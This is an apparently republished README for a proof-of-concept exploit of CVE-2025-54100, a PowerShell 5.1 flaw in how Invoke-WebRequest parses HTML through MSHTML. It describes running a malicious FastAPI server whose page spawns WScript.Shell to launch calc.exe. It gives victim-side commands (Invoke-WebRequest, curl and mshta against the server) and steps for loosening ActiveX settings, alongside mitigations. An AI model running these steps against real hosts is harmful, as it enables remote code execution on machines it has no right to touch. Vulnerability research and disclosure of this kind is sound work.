Share
## https://sploitus.com/exploit?id=E6A77F14-6854-5CBA-865D-1BBEED3DE166
# CVE-2025-54100 – PowerShell Response Parsing PoC

Demonstrates how **CVE-2025-54100** can lead to **remote code execution (RCE)** in **Windows PowerShell 5.1** through malicious HTML parsing. ## Overview
- [What is CVE-2025-54100?](#what-is-cve-2025-54100)
- [How the PoC works](#how-the-poc-works)
- [Quick start](#quick-start)
- [Triggering from a victim host](#triggering-from-a-victim-host)
- [Troubleshooting & verification](#troubleshooting--verification)
- [Evidence](#evidence)
- [Mitigation](#mitigation)
- [Disclaimer](#disclaimer)
- [References](#references)

## What is CVE-2025-54100?
**Vulnerability type:** Command injection risk exists when `Invoke-WebRequest` does not use the `-UseBasicParsing` parameter.

**Criticality:** CVSS 7.8 (High Risk)

**Root cause:** MSHTML-based HTML response parsing allows script execution (e.g., `ActiveXObject`) and runs within the caller’s context.

**Affected systems:**
- Windows 10 / 11
- Windows Server 2008–2025
- PowerShell 5.1

## How the PoC works
1. The FastAPI server in `CVE-2025-54100.py` returns a carefully crafted HTML payload.
2. The script in the HTML attempts to instantiate ActiveX objects like `WScript.Shell` or `Shell.Application`.
3. On a vulnerable system, the MSHTML parser executes the script, demonstrating remote code execution by launching `calc.exe`.
4. The provided payload is **minimized and non-destructive**; it’s used solely for research and verification purposes. It can be expanded for further analysis as needed.

## Quick start
### Environment requirements
- Python 3.10+ (tested in FastAPI and Uvicorn environments)
- Install dependencies:
    ```bash
    python3 -m venv .venv
    source .venv/bin/activate
    pip3 install -r requirements.txt
    ```

### Running the malicious server
Start the PoC HTTP service:
```bash
uvicorn app:app --host 0.0.0.0 --port 8888 --reload
```

## Triggering from a victim host
On a **vulnerable Windows host**, **do not use** `-UseBasicParsing`. Execute the following commands:
```powershell
# Invoke-WebRequest
Invoke-WebRequest -Uri "http://192.168.26.16:8888"
# curl (alias in PowerShell)
curl http://192.168.26.16:8888
# mshta
mshta http://192.168.26.16:8888
```
Ensure the port matches the server configuration. If the system is vulnerable, the embedded script will be executed by the MSHTML parser. > Note: Some antivirus software may block this behavior, even if the parsing vulnerability itself remains exploitable.

## Troubleshooting and verification
1. If `calc.exe` does not pop up:
   1. Open **Internet Options** on the victim host.
   2. Go to **Security → Custom Levels**.
   3. Enable **ā€œInitialize and Scriptize Unsafe ActiveX Controlsā€**.
   4. Re-execute `Invoke-WebRequest` without using `-UseBasicParsing`.

This step is used to verify the execution vector. In real attacks, attackers may use obfuscation or bypass techniques to circumvent default security restrictions.

## Verifying evidence
![PoC](poc.png)

## Mitigations
Microsoft has patched this vulnerability **in December 2025**:
1. Install Windows security updates promptly.
2. **Always use `-UseBasicParsing`** to avoid MSHTML parsing:
   ```powershell
   Invoke-WebRequest -Uri "http://:8888" -UseBasicParsing
   ```
3. Migrate to PowerShell 7+ (pwsh). PowerShell Core no longer relies on MSHTML for parsing, thereby avoiding this issue architecturally.

## References
- [NVD: CVE-2025-54100](https://nvd.nist.gov/vuln/detail/CVE-2025-54100)
- [MSRC: Update Guide](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54100)
- [GitHub: osman1337-security/CVE-2025-54100](https://github.com/osman1337-security/CVE-2025-54100)